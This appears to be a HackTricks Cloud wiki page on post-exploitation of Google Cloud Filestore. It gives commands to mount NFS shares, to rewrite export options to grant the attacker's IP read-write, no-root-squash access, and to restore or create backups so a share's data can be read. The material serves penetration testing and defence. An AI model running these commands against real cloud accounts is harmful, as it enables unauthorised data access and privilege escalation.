GCP - Filestore Post Exploitation

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Filestore

For more information about Filestore check:

GCP - Filestore Enum

Mount Filestore

A shared filesystem might contain sensitive information interesting from an attackers perspective. With access to the Filestore it's possible to mount it:

sudo apt-get update
sudo apt-get install nfs-common
# Check the share name
showmount -e <IP>
# Mount the share
mkdir /mnt/fs
sudo mount [FILESTORE_IP]:/[FILE_SHARE_NAME] /mnt/fs

To find the IP address of a filestore insatnce check the enumeration section of the page:

GCP - Filestore Enum

Remove Restrictions and get extra permissions

If the attacker isn't in an IP address with access over the share, but you have enough permissions to modify it, it's possible to remover the restrictions or access over it. It's also possible to grant more privileges over your IP address to have admin access over the share:

gcloud filestore instances update nfstest \
    --zone=<exact-zone> \
    --flags-file=nfs.json

# Contents of nfs.json
{
  "--file-share":
  {
    "capacity": "1024",
    "name": "<share-name>",
    "nfs-export-options": [
      {
        "access-mode": "READ_WRITE",
        "ip-ranges": [
          "<your-ip-private-address>/32"
        ],
        "squash-mode": "NO_ROOT_SQUASH",
        "anon_uid": 1003,
        "anon_gid": 1003
      }
    ]
  }
}

Restore a backup

If there is a backup it's possible to restore it in an existing or in a new instance so its information becomes accessible:

# Create a new filestore if you don't want to modify the old one
gcloud filestore instances create <new-instance-name> \
    --zone=<zone> \
    --tier=STANDARD \
    --file-share=name=vol1,capacity=1TB \
    --network=name=default,reserved-ip-range=10.0.0.0/29
    
# Restore a backups in a new instance
gcloud filestore instances restore <new-instance-name> \
    --zone=<zone> \
    --file-share=<instance-file-share-name> \
    --source-backup=<backup-name> \
    --source-backup-region=<backup-region>

# Follow the previous section commands to mount it

Create a backup and restore it

If you don't have access over a share and don't want to modify it, it's possible to create a backup of it and restore it as previously mentioned:

# Create share backup
gcloud filestore backups create <back-name> \
    --region=<region> \
    --instance=<instance-name> \
    --instance-zone=<instance-zone> \
    --file-share=<share-name>

# Follow the previous section commands to restore it and mount it

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousGCP - Compute Post Exploitation NextGCP - IAM Post Exploitation

Last updated 4 months ago